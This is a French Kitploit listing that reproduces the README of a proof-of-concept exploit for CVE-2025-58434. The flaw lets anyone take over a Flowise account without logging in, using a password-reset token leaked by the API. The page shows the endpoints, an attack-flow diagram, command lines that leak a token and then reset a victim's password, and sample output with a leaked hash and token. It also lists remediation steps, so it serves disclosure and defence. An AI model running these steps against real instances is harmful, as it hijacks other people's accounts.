Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-58434-poc — Exploit de preuve de concept pour CVE-2025-58434, démontrant une prise de contrôle de compte non authentifiée dans Flowise via des jetons de réinitialisation de mot de passe divulgués. Comprend une attaque en deux étapes : fuite de jeton et réinitialisation du mot de passe. | Kitploit
Outils/GitHubGitHub/kartik2005221/cve-2025-58434-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et ÉducationRed Teaming
GitHubkartik2005221/cve-2025-58434-poc

CVE-2025-58434-poc

Exploit de preuve de concept pour CVE-2025-58434, démontrant une prise de contrôle de compte non authentifiée dans Flowise via des jetons de réinitialisation de mot de passe divulgués. Comprend une attaque en deux étapes : fuite de jeton et réinitialisation du mot de passe.

Voir le dépôt
138il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-58434 — Prise de contrôle de compte Flowise via divulgation de jeton

CVE CVSS Python License Disclosure

⚠️ Ce dépôt est destiné uniquement à la recherche en sécurité éducative et autorisée.
Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est illégale.


Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Flux d'attaque
  • Versions concernées
  • Structure du dépôt
  • Prérequis
  • Installation
  • Utilisation
  • Exemple de sortie
  • Correction
  • Calendrier de divulgation
  • Références
  • Avertissement

  • Aperçu

    Le point d'accès forgot-password dans Flowise (hébergé dans le cloud et auto-hébergé) renvoie un jeton de réinitialisation de mot de passe valide (tempToken) directement dans le corps de la réponse HTTP — sans aucune vérification par e-mail ni authentification.

    Cela signifie qu'un attaquant qui connaît (ou peut deviner) l'adresse e-mail d'une victime peut :

    1. Appeler le point d'accès forgot-password → recevoir le tempToken dans la réponse JSON
    2. Utiliser le tempToken pour appeler reset-password → définir un nouveau mot de passe arbitraire
    3. Se connecter en tant que victime → prise de contrôle totale du compte (ATO)

    Aucun accès préalable, aucune interaction de l'utilisateur et aucun accès à la messagerie ne sont requis.


    Détails de la vulnérabilité

    ChampValeur
    Identifiant CVECVE-2025-58434
    Score CVSS9.8 (Critique)
    Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    CWECWE-640 : Mécanisme de récupération de mot de passe faible
    TypeContournement d'authentification / Exposition d'objet direct non sécurisée
    Application concernéeFlowise (cloud + auto-hébergé)
    Point d'accès 1POST /api/v1/account/forgot-password
    Point d'accès 2POST /api/v1/account/reset-password

    Cause racine

    Le gestionnaire forgot-password renvoie l'intégralité de l'enregistrement utilisateur — y compris le tempToken généré — directement dans la réponse de l'API au lieu de l'envoyer uniquement à l'adresse e-mail enregistrée de l'utilisateur.

    root@kitploit:~
    {
      "user": {
        "id": "<uuid>",
        "name": "Victim Name",
        "email": "[email protected]",
        "credential": "<bcrypt-hash>",
        "tempToken": "<LEAKED_TOKEN_HERE>",
        "tokenExpiry": "2025-08-19T13:00:33.834Z",
        "status": "active"
      }
    }
    

    Flux d'attaque

    root@kitploit:~
    Attaquant                             API Flowise
       │                                       │
       │  POST /forgot-password {email}        │
       │──────────────────────────────────────►│
       │                                       │  (génère tempToken)
       │◄──────────────────────────────────────│
       │  201 { tempToken: "abc123..." }       │
       │                                       │
       │  POST /reset-password {email,         │
       │         tempToken, newPassword}       │
       │──────────────────────────────────────►│
       │                                       │
       │◄──────────────────────────────────────│
       │  200 OK  (mot de passe modifié !)     │
       │                                       │
       ✓  Prise de contrôle du compte terminée
    

    Versions concernées

    • Flowise Cloud (cloud.flowiseai.com) — confirmé affecté
    • Tous les déploiements Flowise auto-hébergés avant le correctif

    Consultez le dépôt GitHub officiel de Flowise pour les informations sur les versions corrigées.


    Structure du dépôt

    root@kitploit:~
    CVE-2025-58434/
    ├── cve_2025_58434_poc.py   # Main PoC script (two-stage ATO)
    ├── requirements.txt         # Python dependencies
    ├── README.md                # This file
    └── DISCLAIMER.md            # Legal notice (read before use)
    

    Prérequis

    • Python 3.7 ou supérieur
    • Bibliothèque requests

    Installation

    root@kitploit:~
    # Cloner le dépôt
    git clone https://github.com/yourhandle/CVE-2025-58434
    cd CVE-2025-58434
    
    # Installer les dépendances
    pip install -r requirements.txt
    

    Utilisation

    Écran d'aide

    root@kitploit:~
    python3 cve_2025_58434_poc.py --help
    

    Étape 1 — Fuite du jeton (Reconnaissance)

    Confirmer que l'instance est vulnérable et récupérer le tempToken sans réinitialiser de mot de passe.

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected]
    

    Étape 2 — Prise de contrôle totale du compte

    Utiliser le jeton divulgué pour réinitialiser le mot de passe immédiatement.

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected] \
      --reset \
      --new-password "MyNewP@ss2025!"
    

    Affichage brut de la réponse JSON

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected] \
      --json-output
    

    Toutes les options

    DrapeauAbrév.DescriptionDéfaut
    --url URL-uURL de base de l'instance Flowise(obligatoire)
    --email EMAIL-eAdresse e-mail du compte cible(obligatoire)
    --reset-rEffectuer l'étape 2 : réinitialiser le mot de passe avec le jeton divulguéFalse
    --new-password PASS-pNouveau mot de passe à définir (utilisé avec --reset)Changeme@2025!
    --timeout SECONDS-tDélai d'attente de la requête HTTP10
    --json-output-jAfficher la réponse JSON brute de l'API sur stdoutFalse

    Exemple de sortie

    root@kitploit:~
      [Step 1] Sending forgot-password request …
      [*] HTTP Status : 201
    
      ========================================================================
        LEAKED ACCOUNT DATA
      ========================================================================
        User ID       : 3fa1c2d4-xxxx-xxxx-xxxx-xxxxxxxxxxxx
        Name          : Admin User
        Email         : [email protected]
        Credential    : $2b$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        Status        : active
        tempToken     : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
        tokenExpiry   : 2025-08-19T13:00:33.834Z
      ========================================================================
    
      [+] tempToken obtained  : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
      [!] VULNERABLE: The instance leaks password reset tokens unauthenticated!
    

    Correction

    Si vous êtes un opérateur d'instance Flowise, appliquez les mesures d'atténuation suivantes immédiatement :

    1. Ne renvoyez jamais les jetons de réinitialisation dans les réponses de l'API. Envoyez le jeton exclusivement via l'adresse e-mail enregistrée.
    2. Renvoie un message de succès générique depuis forgot-password que l'e-mail existe ou non — cela empêche également l'énumération des comptes.
    3. Appliquez des contraintes sur le jeton :
      • À usage unique (invalider après la première utilisation)
      • Expiration courte (par exemple, 15 minutes)
      • Lié à l'IP / User-Agent de la demande si possible
    4. Appliquez le correctif à tous les modèles de déploiement — cloud et auto-hébergé.
    5. Ajoutez une limitation de débit au point d'accès forgot-password.
    6. Consignez et alertez en cas d'activité anormale de réinitialisation de mot de passe.
    7. Envisagez le MFA pour les administrateurs et les comptes à privilèges élevés.

    Calendrier de divulgation

    DateÉvénement
    2025-08-19Vulnérabilité découverte et signalée
    À déterminerAccusé de réception du fournisseur
    À déterminerCorrectif publié
    À déterminerDivulgation publique

    Références

    • Avis GitHub GHSA-wgpv-6j63-x5ph
    • NVD — CVE-2025-58434
    • Dépôt GitHub de Flowise
    • CWE-640 : Mécanisme de récupération de mot de passe faible

    Avertissement

    Ce projet est destiné uniquement à des fins éducatives et aux tests d'intrusion autorisés.

    • N'utilisez PAS cet outil contre un système sans autorisation écrite explicite du propriétaire du système.
    • Le(s) auteur(s) de ce dépôt décline(nt) toute responsabilité en cas d'utilisation abusive, de dommage ou de conséquences juridiques découlant d'une utilisation non autorisée.
    • Voir DISCLAIMER.md pour l'avis juridique complet.
    Télécharger l’outil